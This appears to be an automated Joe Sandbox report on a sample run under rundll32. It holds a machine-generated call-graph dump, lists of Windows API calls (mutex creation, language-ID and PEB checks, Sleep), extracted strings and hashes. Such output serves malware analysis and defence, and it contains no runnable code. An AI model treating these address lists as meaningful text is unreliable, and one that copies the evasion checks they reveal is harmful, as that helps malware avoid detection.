49 API calls 47699->47713 47700 7edbcde8 48230 7edb6760 39 API calls std::ios_base::clear 47700->48230 48226 7ed94730 28 API calls 47701->48226 47709 7eda6300 std::ios_base::clear 28 API calls 47702->47709 47710 7edbc63d 47703->47710 47711 7edee5d0 107 API calls 47704->47711 47712 7ed945a0 49 API calls 47705->47712 47708 7edbcb54 47715 7eda6300 std::ios_base::clear 28 API calls 47708->47715 47716 7edbc8e7 47709->47716 47717 7eda6300 std::ios_base::clear 28 API calls 47710->47717 47718 7edbc3ae 47711->47718 47719 7edbd375 47712->47719 47720 7edbd0c2 47713->47720 47714 7edbcded 47721 7ed945a0 49 API calls 47714->47721 47722 7edbcb75 47715->47722 47723 7eda6300 std::ios_base::clear 28 API calls 47716->47723 47724 7edbc65e 47717->47724 48214 7eda91b0 49 API calls Concurrency::cancellation_token_source::~cancellation_token_source 47718->48214 48238 7ed94290 49 API calls Concurrency::cancellation_token_source::~cancellation_token_source 47719->48238 48234 7ed94730 28 API calls 47720->48234 47728 7edbce2e 47721->47728 47729 7eda6300 std::ios_base::clear 28 API calls 47722->47729 47730 7edbc908 47723->47730 47731 7eda6300 std::ios_base::clear 28 API calls 47724->47731 48231 7ed94730 28 API calls 47728->48231 47737 7edbcba7 47729->47737 47738 7ede9e70 49 API calls 47730->47738 47739 7edbc67f 47731->47739 47732->47551 47733 7edbd37b 47740 7edbd508 47733->47740 47747 7ed945a0 49 API calls 47733->47747 47734 7edbd0c9 48235 7edb65b0 44 API calls std::ios_base::clear 47734->48235 47743 7eda6300 std::ios_base::clear 28 API calls 47737->47743 47744 7edbc91e 47738->47744 47745 7edee5d0 107 API calls 47739->47745 47746 7ed945a0 49 API calls 47740->47746 47741 7edbd0ce 47755 7ed945a0 49 API calls 47741->47755 47742 7edbce35 47749 7eda6300 std::ios_base::clear 28 API calls 47742->47749 47750 7edbcbc8 47743->47750 47751 7eda6300 std::ios_base::clear 28 API calls 47744->47751 47752 7edbc68f 47745->47752 47753 7edbd656 47746->47753 47748 7edbd3a3 47747->47748 48239 7ed94730 28 API calls 47748->48239 47756 7edbce56 47749->47756 47757 7eda6300 std::ios_base::clear 28 API calls 47750->47757 47758 7edbc93f 47751->47758 48219 7eda91b0 49 API calls Concurrency::cancellation_token_source::~cancellation_token_source 47752->48219 48242 7ed94290 49 API calls Concurrency::cancellation_token_source::~cancellation_token_source 47753->48242 47762 7edbd10f 47755->47762 47763 7eda6300 std::ios_base::clear 28 API calls 47756->47763 47764 7edbcbe9 47757->47764 47765 7eda6300 std::ios_base::clear 28 API calls 47758->47765 47761 7edbd65c 47761->47401 47770 7ed945a0 49 API calls 47761->47770 48236 7ed94730 28 API calls 47762->48236 47767 7edbce88 47763->47767 47768 7ede9e70 49 API calls 47764->47768 47769 7edbc960 47765->47769 47772 7eda6300 std::ios_base::clear 28 API calls 47767->47772 47773 7edbcbff 47768->47773 47774 7edee5d0 107 API calls 47769->47774 47775 7edbd684 47770->47775 47771 7edbd116 47777 7eda6300 std::ios_base::clear 28 API calls 47771->47777 47778 7edbcea9 47772->47778 47779 7eda6300 std::ios_base::clear 28 API calls 47773->47779 47780 7edbc970 47774->47780 48243 7ed94730 28 API calls 47775->48243 47776 7edbd3aa 47782 7ed945a0 49 API calls 47776->47782 47783 7edbd137 47777->47783 47784 7eda6300 std::ios_base::clear 28 API calls 47778->47784 47785 7edbcc20 47779->47785 48223 7eda91b0 49 API calls Concurrency::cancellation_token_source::~cancellation_token_source 47780->48223 47788 7edbd3f0 47782->47788 47789 7eda6300 std::ios_base::clear 28 API calls 47783->47789 47790 7edbceca 47784->47790 47791 7eda6300 std::ios_base::clear 28 API calls 47785->47791 47787 7edbd68b 48244 7edbeaa0 36 API calls std::ios_base::clear 47787->48244 48240 7ed94730 28 API calls 47788->48240 47794 7edbd169 47789->47794 47795 7ede9e70 49 API calls 47790->47795 47796 7edbcc41 47791->47796 47799 7eda6300 std::ios_base::clear 28 API calls 47794->47799 47800 7edbcee0 47795->47800 47801 7edee5d0 107 API calls 47796->47801 47797 7edbd690 47807 7ed945a0 49 API calls 47797->47807 47798 7edbd3f7 47803 7eda6300 std::ios_base::clear 28 API calls 47798->47803 47804 7edbd18a 47799->47804 47805 7eda6300 std::ios_base::clear 28 API calls 47800->47805 47802 7edbcc51 47801->47802 48227 7eda91b0 49 API calls Concurrency::cancellation_token_source::~cancellation_token_source 47802->48227 47808 7edbd418 47803->47808 47809 7eda6300 std::ios_base::clear 28 API calls 47804->47809 47810 7edbcf01 47805->47810 47812 7edbd6d1 47807->47812 47813 7eda6300 std::ios_base::clear 28 API calls 47808->47813 47814 7edbd1ab 47809->47814 47811 7eda6300 std::ios_base::clear 28 API calls 47810->47811 47815 7edbcf22 47811->47815 48245 7ed94730 28 API calls 47812->48245 47817 7edbd44a 47813->47817 47818 7ede9e70 49 API calls 47814->47818 47820 7edee5d0 107 API calls 47815->47820 47822 7eda6300 std::ios_base::clear 28 API calls 47817->47822 47819 7edbd1c1 47818->47819 47823 7eda6300 std::ios_base::clear 28 API calls 47819->47823 47824 7edbcf32 47820->47824 47821 7edbd6d8 47825 7eda6300 std::ios_base::clear 28 API calls 47821->47825 47826 7edbd46b 47822->47826 47828 7edbd1e2 47823->47828 48232 7eda91b0 49 API calls Concurrency::cancellation_token_source::~cancellation_token_source 47824->48232 47830 7edbd6f9 47825->47830 47827 7eda6300 std::ios_base::clear 28 API calls 47826->47827 47831 7edbd48c 47827->47831 47832 7eda6300 std::ios_base::clear 28 API calls 47828->47832 47833 7eda6300 std::ios_base::clear 28 API calls 47830->47833 47835 7ede9e70 49 API calls 47831->47835 47836 7edbd203 47832->47836 47834 7edbd72b 47833->47834 47837 7eda6300 std::ios_base::clear 28 API calls 47834->47837 47838 7edbd4a2 47835->47838 47839 7edee5d0 107 API calls 47836->47839 47840 7edbd74c 47837->47840 47841 7eda6300 std::ios_base::clear 28 API calls 47838->47841 47842 7edbd213 47839->47842 47843 7eda6300 std::ios_base::clear 28 API calls 47840->47843 47844 7edbd4c3 47841->47844 48237 7eda91b0 49 API calls Concurrency::cancellation_token_source::~cancellation_token_source 47842->48237 47846 7edbd76d 47843->47846 47847 7eda6300 std::ios_base::clear 28 API calls 47844->47847 47848 7ede9e70 49 API calls 47846->47848 47849 7edbd4e4 47847->47849 47850 7edbd783 47848->47850 47851 7edee5d0 107 API calls 47849->47851 47852 7eda6300 std::ios_base::clear 28 API calls 47850->47852 47853 7edbd4f4 47851->47853 47854 7edbd7a4 47852->47854 48241 7eda91b0 49 API calls Concurrency::cancellation_token_source::~cancellation_token_source 47853->48241 47856 7eda6300 std::ios_base::clear 28 API calls 47854->47856 47857 7edbd7c5 47856->47857 47858 7edee5d0 107 API calls 47857->47858 47859 7edbd7d5 47858->47859 48246 7eda91b0 49 API calls Concurrency::cancellation_token_source::~cancellation_token_source 47859->48246 47862 7ed93130 49 API calls 47861->47862 47863 7ed944d7 47862->47863 47864 7edc6d20 Concurrency::cancellation_token_source::~cancellation_token_source 47 API calls 47863->47864 47865 7ed9450f 47864->47865 47866 7edcc510 Concurrency::cancellation_token_source::~cancellation_token_source 49 API calls 47865->47866 47867 7ed9451c 47866->47867 47867->47409 47869 7edee60c 47868->47869 48247 7edb1660 47869->48247 47871 7edee63c 48251 7edb03e0 47871->48251 47873 7edee666 48255 7edb2640 47873->48255 47875 7edee687 47878 7edc6db0 28 API calls 47875->47878 47879 7edee713 47875->47879 47876 7edee782 47877 7ed93130 49 API calls 47876->47877 47880 7edee79e 47877->47880 47878->47879 47879->47876 47881 7edc6db0 28 API calls 47879->47881 47882 7eda6300 std::ios_base::clear 28 API calls 47880->47882 47881->47876 47883 7edee7c9 47882->47883 47883->47883 47884 7ed95330 numpunct 28 API calls 47883->47884 47885 7edee86a 47884->47885 47886 7edca810 28 API calls 47885->47886 47887 7edee884 std::ios_base::clear 47886->47887 47888 7eddad50 4 API calls 47887->47888 47889 7edee8b7 47888->47889 47890 7ed93130 49 API calls 47889->47890 47891 7edee8de 47890->47891 47892 7eda5eb0 49 API calls 47891->47892 47893 7edee942 47892->47893 47894 7ed93130 49 API calls 47893->47894 47895 7edee975 47894->47895 47896 7eda6300 std::ios_base::clear 28 API calls 47895->47896 47897 7edee9a0 47896->47897 47898 7ed945a0 49 API calls 47897->47898 47899 7edee9ca 47898->47899 47900 7ed9d1c0 28 API calls 47899->47900 47901 7edee9e2 47900->47901 47902 7edca810 28 API calls 47901->47902 47903 7edeea01 std::ios_base::clear 47902->47903 47904 7eddad50 4 API calls 47903->47904 47905 7edeea34 47904->47905 47906 7ed93130 49 API calls 47905->47906 47907 7edeea5b 47906->47907 47908 7eda5eb0 49 API calls 47907->47908 47909 7edeeabf 47908->47909 47910 7ed93130 49 API calls 47909->47910 47911 7edeeaf2 47910->47911 47912 7eda6300 std::ios_base::clear 28 API calls 47911->47912 47913 7edeeb1d 47912->47913 47914 7ed945a0 49 API calls 47913->47914 47915 7edeeb47 47914->47915 47916 7ed9d1c0 28 API calls 47915->47916 47917 7edeeb5f 47916->47917 47918 7edca810 28 API calls 47917->47918 47919 7edeeb7e std::ios_base::clear 47918->47919 47920 7eddad50 4 API calls 47919->47920 47921 7edeebb1 47920->47921 47922 7ed93130 49 API calls 47921->47922 47923 7edeebd8 47922->47923 47924 7eda5eb0 49 API calls 47923->47924 47925 7edeec3c 47924->47925 47926 7ed93130 49 API calls 47925->47926 47927 7edeec6f 47926->47927 47928 7eda6300 std::ios_base::clear 28 API calls 47927->47928 47929 7edeec9a 47928->47929 47930 7ed945a0 49 API calls 47929->47930 47931 7edeecc4 47930->47931 47932 7ed9d1c0 28 API calls 47931->47932 47933 7edeecdc 47932->47933 47934 7edca810 28 API calls 47933->47934 47935 7edeecfb std::ios_base::clear 47934->47935 47936 7eddad50 4 API calls 47935->47936 47937 7edeed2e 47936->47937 47938 7ed93130 49 API calls 47937->47938 47939 7edeed55 47938->47939 47940 7eda5eb0 49 API calls 47939->47940 47941 7edeedb9 47940->47941 47942 7ed93130 49 API calls 47941->47942 47943 7edeedec 47942->47943 47944 7eda6300 std::ios_base::clear 28 API calls 47943->47944 47945 7edeee17 47944->47945 47946 7ed945a0 49 API calls 47945->47946 47947 7edeee41 47946->47947 47948 7ed9d1c0 28 API calls 47947->47948 47949 7edeee59 47948->47949 47950 7edca810 28 API calls 47949->47950 47951 7edeee7a std::ios_base::clear 47950->47951 47952 7eddad50 4 API calls 47951->47952 47953 7edeeead 47952->47953 47954 7ed93130 49 API calls 47953->47954 47955 7edeeed4 47954->47955 47956 7eda5eb0 49 API calls 47955->47956 47957 7edeef38 47956->47957 47958 7ed93130 49 API calls 47957->47958 47959 7edeef6b 47958->47959 47960 7eda6300 std::ios_base::clear 28 API calls 47959->47960 47961 7edeef96 47960->47961 48259 7eda63e0 47961->48259 47964 7edca810 28 API calls 47965 7edeefd5 std::ios_base::clear 47964->47965 47966 7eddad50 4 API calls 47965->47966 47967 7edef008 47966->47967 47968 7ed93130 49 API calls 47967->47968 47969 7edef02f 47968->47969 47970 7eda5eb0 49 API calls 47969->47970 47971 7edef093 47970->47971 47972 7ed93130 49 API calls 47971->47972 47973 7edef0c6 47972->47973 47974 7eda6300 std::ios_base::clear 28 API calls 47973->47974 47975 7edef0f1 47974->47975 47976 7eda63e0 28 API calls 47975->47976 47977 7edef11d 47976->47977 47978 7edca810 28 API calls 47977->47978 47979 7edef133 std::ios_base::clear 47978->47979 47980 7eddad50 4 API calls 47979->47980 47981 7edef166 47980->47981 47982 7ed93130 49 API calls 47981->47982 47983 7edef18d 47982->47983 47984 7eda5eb0 49 API calls 47983->47984 47985 7edef1f1 47984->47985 47986 7eda5eb0 49 API calls 47985->47986 47987 7edef23a 47986->47987 47988 7edc5c10 std::ios_base::clear 26 API calls 47987->47988 47989 7edef27b 47988->47989 47990 7edc5c10 std::ios_base::clear 26 API calls 47989->47990 47991 7edef2a3 47990->47991 47992 7edc5c10 std::ios_base::clear 26 API calls 47991->47992 47993 7edef2cb 47992->47993 47994 7edc5c10 std::ios_base::clear 26 API calls 47993->47994 47995 7edef2f3 47994->47995 47996 7edc5c10 std::ios_base::clear 26 API calls 47995->47996 47997 7edef31b 47996->47997 47998 7edc5c10 std::ios_base::clear 26 API calls 47997->47998 47999 7edef343 47998->47999 48000 7edc5c10 std::ios_base::clear 26 API calls 47999->48000 48001 7edef36b 48000->48001 48002 7edd8850 49 API calls 48001->48002 48003 7edef382 std::ios_base::clear 48002->48003 48004 7eddad50 4 API calls 48003->48004 48005 7edef3b5 48004->48005 48005->48005 48006 7ed95330 numpunct 28 API calls 48005->48006 48007 7edef439 48006->48007 48008 7edc5c10 std::ios_base::clear 26 API calls 48007->48008 48009 7edef448 48008->48009 48010 7ed948a0 28 API calls 48009->48010 48011 7edef462 48010->48011 48012 7eda9d80 26 API calls 48011->48012 48013 7edef47d 48012->48013 48014 7edc5c10 std::ios_base::clear 26 API calls 48013->48014 48015 7edef488 48014->48015 48016 7eda6300 std::ios_base::clear 28 API calls 48015->48016 48017 7edef49f 48016->48017 48018 7eda6300 std::ios_base::clear 28 API calls 48017->48018 48019 7edef4bd 48018->48019 48020 7eda6300 std::ios_base::clear 28 API calls 48019->48020 48021 7edef4db 48020->48021 48022 7edf1d60 82 API calls 48021->48022 48023 7edef4eb 48022->48023 48024 7edef560 48023->48024 48265 7edb1e30 29 API calls swprintf 48023->48265 48026 7eda6300 std::ios_base::clear 28 API calls 48024->48026 48027 7edef577 48026->48027 48028 7eda6300 std::ios_base::clear 28 API calls 48027->48028 48030 7edef595 48028->48030 48029 7edef51a std::ios_base::clear 48266 7eda1c90 GetPEB 48029->48266 48030->48030 48033 7ed95330 numpunct 28 API calls 48030->48033 48032 7edef553 48032->48024 48036 7edefea1 48032->48036 48034 7edef637 48033->48034 48035 7edf1d60 82 API calls 48034->48035 48037 7edef64b 48035->48037 48038 7eda6300 std::ios_base::clear 28 API calls 48036->48038 48039 7edef6c0 48037->48039 48267 7edacd00 29 API calls swprintf 48037->48267 48040 7edefeb5 48038->48040 48041 7eda6300 std::ios_base::clear 28 API calls 48039->48041 48043 7eda6300 std::ios_base::clear 28 API calls 48040->48043 48044 7edef6d7 48041->48044 48045 7edefed6 48043->48045 48046 7eda6300 std::ios_base::clear 28 API calls 48044->48046 48276 7edcc160 54 API calls 4 library calls 48045->48276 48053 7edef6f5 48046->48053 48048 7edefee3 48050 7edc5c10 std::ios_base::clear 26 API calls 48048->48050 48049 7edef67a std::ios_base::clear 48268 7eda1c90 GetPEB 48049->48268 48051 7edeff04 48050->48051 48052 7edc5c10 std::ios_base::clear 26 API calls 48051->48052 48056 7edeff13 48052->48056 48053->48053 48058 7ed95330 numpunct 28 API calls 48053->48058 48055 7edef6b3 48055->48039 48061 7edefda4 48055->48061 48057 7edc6d20 Concurrency::cancellation_token_source::~cancellation_token_source 47 API calls 48056->48057 48059 7edeff1f 48057->48059 48060 7edef796 48058->48060 48062 7edcc510 Concurrency::cancellation_token_source::~cancellation_token_source 49 API calls 48059->48062 48063 7edf1d60 82 API calls 48060->48063 48065 7eda6300 std::ios_base::clear 28 API calls 48061->48065 48064 7edeff2c 48062->48064 48066 7edef7aa 48063->48066 48068 7edc5c10 std::ios_base::clear 26 API calls 48064->48068 48069 7edefdb8 48065->48069 48067 7edef81f 48066->48067 48269 7edb1730 29 API calls swprintf 48066->48269 48072 7eda6300 std::ios_base::clear 28 API calls 48067->48072 48071 7edeff3b 48068->48071 48073 7eda6300 std::ios_base::clear 28 API calls 48069->48073 48074 7edc5c10 std::ios_base::clear 26 API calls 48071->48074 48075 7edef836 48072->48075 48076 7edefdd9 48073->48076 48077 7edeff47 48074->48077 48078 7eda6300 std::ios_base::clear 28 API calls 48075->48078 48275 7edcc160 54 API calls 4 library calls 48076->48275 48080 7edc5c10 std::ios_base::clear 26 API calls 48077->48080 48087 7edef854 48078->48087 48084 7edeff53 48080->48084 48081 7edefde6 48082 7edc5c10 std::ios_base::clear 26 API calls 48081->48082 48085 7edefe07 48082->48085 48083 7edef7d9 std::ios_base::clear 48270 7eda1c90 GetPEB 48083->48270 48086 7edc6d20 Concurrency::cancellation_token_source::~cancellation_token_source 47 API calls 48084->48086 48088 7edc5c10 std::ios_base::clear 26 API calls 48085->48088 48090 7edeff5f 48086->48090 48087->48087 48095 7ed95330 numpunct 28 API calls 48087->48095 48091 7edefe16 48088->48091 48093 7edcc510 Concurrency::cancellation_token_source::~cancellation_token_source 49 API calls 48090->48093 48096 7edc5c10 std::ios_base::clear 26 API calls 48091->48096 48092 7edef812 48092->48067 48103 7edefc98 48092->48103 48094 7edeff6c 48093->48094 48097 7edc5c10 std::ios_base::clear 26 API calls 48094->48097 48098 7edef8f6 48095->48098 48099 7edefe25 48096->48099 48100 7edeff78 48097->48100 48101 7edf1d60 82 API calls 48098->48101 48102 7edc6d20 Concurrency::cancellation_token_source::~cancellation_token_source 47 API calls 48099->48102 48104 7edc5c10 std::ios_base::clear 26 API calls 48100->48104 48105 7edef90a 48101->48105 48106 7edefe31 48102->48106 48107 7eda6300 std::ios_base::clear 28 API calls 48103->48107 48180 7edbda48 48104->48180 48108 7edef97f GetPEB 48105->48108 48271 7edb0d00 29 API calls swprintf 48105->48271 48109 7edcc510 Concurrency::cancellation_token_source::~cancellation_token_source 49 API calls 48106->48109 48110 7edefcac 48107->48110 48126 7edef9c9 48108->48126 48112 7edefe3e 48109->48112 48113 7eda6300 std::ios_base::clear 28 API calls 48110->48113 48114 7edc5c10 std::ios_base::clear 26 API calls 48112->48114 48115 7edefccd 48113->48115 48116 7edefe4d 48114->48116 48274 7edcc160 54 API calls 4 library calls 48115->48274 48118 7edc5c10 std::ios_base::clear 26 API calls 48116->48118 48121 7edefe59 48118->48121 48119 7edefcda 48122 7edc5c10 std::ios_base::clear 26 API calls 48119->48122 48120 7edef939 std::ios_base::clear 48272 7eda1c90 GetPEB 48120->48272 48124 7edc5c10 std::ios_base::clear 26 API calls 48121->48124 48123 7edefcfb 48122->48123 48125 7edc5c10 std::ios_base::clear 26 API calls 48123->48125 48128 7edefe65 48124->48128 48131 7edefd0a 48125->48131 48134 7eda6300 std::ios_base::clear 28 API calls 48126->48134 48130 7edc6d20 Concurrency::cancellation_token_source::~cancellation_token_source 47 API calls 48128->48130 48129 7edef972 48129->48108 48129->48126 48132 7edefe71 48130->48132 48133 7edc5c10 std::ios_base::clear 26 API calls 48131->48133 48135 7edcc510 Concurrency::cancellation_token_source::~cancellation_token_source 49 API calls 48132->48135 48136 7edefd19 48133->48136 48137 7edefb91 48134->48137 48138 7edefe7e 48135->48138 48139 7edc5c10 std::ios_base::clear 26 API calls 48136->48139 48140 7eda6300 std::ios_base::clear 28 API calls 48137->48140 48141 7edc5c10 std::ios_base::clear 26 API calls 48138->48141 48142 7edefd28 48139->48142 48143 7edefbb2 48140->48143 48144 7edefe8a 48141->48144 48145 7edc6d20 Concurrency::cancellation_token_source::~cancellation_token_source 47 API calls 48142->48145 48273 7edcc160 54 API calls 4 library calls 48143->48273 48147 7edc5c10 std::ios_base::clear 26 API calls 48144->48147 48148 7edefd34 48145->48148 48147->48180 48150 7edcc510 Concurrency::cancellation_token_source::~cancellation_token_source 49 API calls 48148->48150 48149 7edefbbf 48151 7edc5c10 std::ios_base::clear 26 API calls 48149->48151 48152 7edefd41 48150->48152 48153 7edefbe0 48151->48153 48154 7edc5c10 std::ios_base::clear 26 API calls 48152->48154 48155 7edc5c10 std::ios_base::clear 26 API calls 48153->48155 48156 7edefd50 48154->48156 48157 7edefbef 48155->48157 48159 7edc5c10 std::ios_base::clear 26 API calls 48156->48159 48158 7edc5c10 std::ios_base::clear 26 API calls 48157->48158 48160 7edefbfe 48158->48160 48161 7edefd5c 48159->48161 48162 7edc5c10 std::ios_base::clear 26 API calls 48160->48162 48163 7edc5c10 std::ios_base::clear 26 API calls 48161->48163 48165 7edefc0d 48162->48165 48164 7edefd68 48163->48164 48166 7edc6d20 Concurrency::cancellation_token_source::~cancellation_token_source 47 API calls 48164->48166 48167 7edc5c10 std::ios_base::clear 26 API calls 48165->48167 48168 7edefd74 48166->48168 48169 7edefc1c 48167->48169 48170 7edcc510 Concurrency::cancellation_token_source::~cancellation_token_source 49 API calls 48168->48170 48171 7edc6d20 Concurrency::cancellation_token_source::~cancellation_token_source 47 API calls 48169->48171 48172 7edefd81 48170->48172 48173 7edefc28 48171->48173 48174 7edc5c10 std::ios_base::clear 26 API calls 48172->48174 48175 7edcc510 Concurrency::cancellation_token_source::~cancellation_token_source 49 API calls 48173->48175 48176 7edefd8d 48174->48176 48177 7edefc35 48175->48177 48178 7edc5c10 std::ios_base::clear 26 API calls 48176->48178 48179 7edc5c10 std::ios_base::clear 26 API calls 48177->48179 48178->48180 48181 7edefc44 48179->48181 48180->47432 48182 7edc5c10 std::ios_base::clear 26 API calls 48181->48182 48183 7edefc50 48182->48183 48184 7edc5c10 std::ios_base::clear 26 API calls 48183->48184 48185 7edefc5c 48184->48185 48186 7edc6d20 Concurrency::cancellation_token_source::~cancellation_token_source 47 API calls 48185->48186 48187 7edefc68 48186->48187 48188 7edcc510 Concurrency::cancellation_token_source::~cancellation_token_source 49 API calls 48187->48188 48189 7edefc75 48188->48189 48190 7edc5c10 std::ios_base::clear 26 API calls 48189->48190 48191 7edefc81 48190->48191 48192 7edc5c10 std::ios_base::clear 26 API calls 48191->48192 48192->48180 48193->47417 48194->47430 48195->47442 48196->47469 48197->47489 48198->47606 48199->47456 48200->47494 48201->47520 48202->47633 48203->47478 48204->47526 48205->47546 48206->47665 48207->47506 48208->47553 48209->47580 48210->47698 48211->47539 48212->47587 48213->47616 48214->47732 48215->47572 48216->47601 48217->47615 48218->47647 48219->47578 48220->47600 48221->47653 48222->47679 48223->47607 48224->47634 48225->47686 48226->47708 48227->47639 48228->47666 48229->47700 48230->47714 48231->47742 48232->47672 48233->47699 48234->47734 48235->47741 48236->47771 48237->47705 48238->47733 48239->47776 48240->47798 48241->47740 48242->47761 48243->47787 48244->47797 48245->47821 48246->47401 48248 7edb171d 48247->48248 48250 7edb1698 swprintf 48247->48250 48248->47871 48277 7ee02f6c 29 API calls 48250->48277 48252 7edb0495 48251->48252 48254 7edb0410 swprintf 48251->48254 48252->47873 48278 7ee02f6c 29 API calls 48254->48278 48256 7edb26fd 48255->48256 48257 7edb2678 swprintf 48255->48257 48256->47875 48279 7ee02f6c 29 API calls 48257->48279 48260 7eda6446 48259->48260 48262 7eda644b 48259->48262 48280 7edc5f30 28 API calls 48260->48280 48263 7ed95330 numpunct 28 API calls 48262->48263 48264 7eda64e2 48263->48264 48264->47964 48265->48029 48266->48032 48267->48049 48268->48055 48269->48083 48270->48092 48271->48120 48272->48129 48273->48149 48274->48119 48275->48081 48276->48048 48277->48248 48278->48252 48279->48256 48280->48262
                  APIs
                  • CreateMutexA.KERNEL32(00000000,00000001,?,?,?,00000000,00000000), ref: 7EDBF4E9
                  • GetLastError.KERNEL32 ref: 7EDBF567
                  • GetModuleHandleA.KERNEL32(gdi32), ref: 7EDBFABE
                  • GetUserDefaultLangID.KERNEL32 ref: 7EDC0093
                  • GetShellWindow.USER32 ref: 7EDC0690
                  • IsValidCodePage.KERNEL32(000000D7), ref: 7EDC0B95
                  Strings
                  Memory Dump Source
                  • Source File: 0000000D.00000002.2510567036.000000007ED90000.00000040.00001000.00020000.00000000.sdmp, Offset: 7ED90000, based on PE: true
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_13_2_7ed90000_rundll32.jbxd
                  Yara matches
                  Similarity
                  • API ID: CodeCreateDefaultErrorHandleLangLastModuleMutexPageShellUserValidWindow
                  • String ID: &$5$:FailedAddIndicator$DD?ljh$Lnotadirectory$gdi32
                  • API String ID: 2935116415-1631222951
                  • Opcode ID: 315b91945699c7834d36057f2867d6a6276e6747f4ad8f5ba13654ab58ce6714
                  • Instruction ID: dc313509893404d5a4ce88c1d6fd6bae6813a1854ec97d994482443940386fa3
                  • Opcode Fuzzy Hash: 315b91945699c7834d36057f2867d6a6276e6747f4ad8f5ba13654ab58ce6714
                  • Instruction Fuzzy Hash: 5D53AF79904368CEDB14CF6AC8907FEBBB5BF49300F24899AE449E7265D7348A81CF51

                  Control-flow Graph

                  • Executed
                  • Not Executed
                  control_flow_graph 493 7edb9fb1-7edba58b call 7ee02f90 call 7ede23a0 call 7ee02f90 * 2 call 7ee02fd0 517 7edbdcd8 IsValidCodePage lstrlenA GetWindowTextLengthA 493->517 518 7edba591-7edba5bd 493->518 530 7edb9e37-7edb9ead 517->530 521 7edba5bf-7edba5c8 518->521 522 7edba5ce-7edbab5a GetSystemDefaultLangID call 7ee02f90 call 7ee03110 518->522 521->522 550 7edbd922-7edbdcd2 call 7eda6730 call 7eda6300 * 4 call 7ede9e70 call 7eda6300 * 2 call 7edee5d0 call 7eda9cc0 GetPEB call 7ed9d080 Sleep 522->550 551 7edbab60-7edbad65 522->551 550->517 562 7edbad67-7edbad73 551->562 563 7edbad75-7edbad92 551->563 562->563 567 7edbad9d-7edbaed8 call 7ee02f90 call 7ed945a0 call 7ed944b0 563->567 568 7edbad94-7edbad9b 563->568 567->550 589 7edbaede-7edbb010 call 7ee02f90 call 7ed945a0 call 7ed94290 567->589 568->567 614 7edbb349-7edbb36c call 7ed945a0 call 7ed94290 589->614 615 7edbb016-7edbb1e1 call 7ed945a0 call 7ed9d1c0 call 7edcf690 call 7ed945a0 call 7ed9d1c0 call 7eda6300 * 4 call 7ede9e70 call 7eda6300 * 2 call 7edee5d0 call 7edc6d20 call 7edcc510 589->615 624 7edbb372-7edbb541 call 7ed945a0 call 7ed9d1c0 call 7edd0ff0 call 7ed945a0 call 7ed9d1c0 call 7eda6300 * 4 call 7ede9e70 call 7eda6300 * 2 call 7edee5d0 call 7edc6d20 call 7edcc510 614->624 625 7edbb696-7edbb6b9 call 7ed945a0 call 7ed94290 614->625 615->614 624->625 640 7edbb6bf-7edbb83e call 7ed945a0 call 7ed94730 call 7edd2950 call 7ed945a0 call 7ed94730 call 7eda6300 * 4 call 7ede9e70 call 7eda6300 * 2 call 7edee5d0 call 7eda91b0 625->640 641 7edbb977-7edbb99a call 7ed945a0 call 7ed94290 625->641 640->641 659 7edbbc58-7edbbc7b call 7ed945a0 call 7ed94290 641->659 660 7edbb9a0-7edbbb1f call 7ed945a0 call 7ed94730 call 7edd4bd0 call 7ed945a0 call 7ed94730 call 7eda6300 * 4 call 7ede9e70 call 7eda6300 * 2 call 7edee5d0 call 7eda91b0 641->660 684 7edbbf39-7edbbf5c call 7ed945a0 call 7ed94290 659->684 685 7edbbc81-7edbbe00 call 7ed945a0 call 7ed94730 call 7edd6d40 call 7ed945a0 call 7ed94730 call 7eda6300 * 4 call 7ede9e70 call 7eda6300 * 2 call 7edee5d0 call 7eda91b0 659->685 660->659 714 7edbc21a-7edbc23d call 7ed945a0 call 7ed94290 684->714 715 7edbbf62-7edbc0e1 call 7ed945a0 call 7ed94730 call 7edf5760 call 7ed945a0 call 7ed94730 call 7eda6300 * 4 call 7ede9e70 call 7eda6300 * 2 call 7edee5d0 call 7eda91b0 684->715 685->684 754 7edbc4fb-7edbc51e call 7ed945a0 call 7ed94290 714->754 755 7edbc243-7edbc3c2 call 7ed945a0 call 7ed94730 call 7edf6240 call 7ed945a0 call 7ed94730 call 7eda6300 * 4 call 7ede9e70 call 7eda6300 * 2 call 7edee5d0 call 7eda91b0 714->755 715->714 792 7edbc7dc-7edbc7ff call 7ed945a0 call 7ed94290 754->792 793 7edbc524-7edbc6a3 call 7ed945a0 call 7ed94730 call 7edbe090 call 7ed945a0 call 7ed94730 call 7eda6300 * 4 call 7ede9e70 call 7eda6300 * 2 call 7edee5d0 call 7eda91b0 754->793 755->754 823 7edbcabd-7edbcae0 call 7ed945a0 call 7ed94290 792->823 824 7edbc805-7edbc984 call 7ed945a0 call 7ed94730 call 7edbdd40 call 7ed945a0 call 7ed94730 call 7eda6300 * 4 call 7ede9e70 call 7eda6300 * 2 call 7edee5d0 call 7eda91b0 792->824 793->792 858 7edbcd9e-7edbcdc1 call 7ed945a0 call 7ed94290 823->858 859 7edbcae6-7edbcc65 call 7ed945a0 call 7ed94730 call 7edbec20 call 7ed945a0 call 7ed94730 call 7eda6300 * 4 call 7ede9e70 call 7eda6300 * 2 call 7edee5d0 call 7eda91b0 823->859 824->823 895 7edbd07f-7edbd0a2 call 7ed945a0 call 7ed94290 858->895 896 7edbcdc7-7edbcf46 call 7ed945a0 call 7ed94730 call 7edb6760 call 7ed945a0 call 7ed94730 call 7eda6300 * 4 call 7ede9e70 call 7eda6300 * 2 call 7edee5d0 call 7eda91b0 858->896 859->858 931 7edbd0a8-7edbd227 call 7ed945a0 call 7ed94730 call 7edb65b0 call 7ed945a0 call 7ed94730 call 7eda6300 * 4 call 7ede9e70 call 7eda6300 * 2 call 7edee5d0 call 7eda91b0 895->931 932 7edbd360-7edbd383 call 7ed945a0 call 7ed94290 895->932 896->895 931->932 968 7edbd389-7edbd508 call 7ed945a0 call 7ed94730 call 7edbe3e0 call 7ed945a0 call 7ed94730 call 7eda6300 * 4 call 7ede9e70 call 7eda6300 * 2 call 7edee5d0 call 7eda91b0 932->968 969 7edbd641-7edbd664 call 7ed945a0 call 7ed94290 932->969 968->969 969->550 998 7edbd66a-7edbd7e9 call 7ed945a0 call 7ed94730 call 7edbeaa0 call 7ed945a0 call 7ed94730 call 7eda6300 * 4 call 7ede9e70 call 7eda6300 * 2 call 7edee5d0 call 7eda91b0 969->998 998->550
                  APIs
                  • IsValidCodePage.KERNEL32(17BCCBAC), ref: 7EDB9C77
                  • lstrlenA.KERNEL32(?), ref: 7EDB9CB8
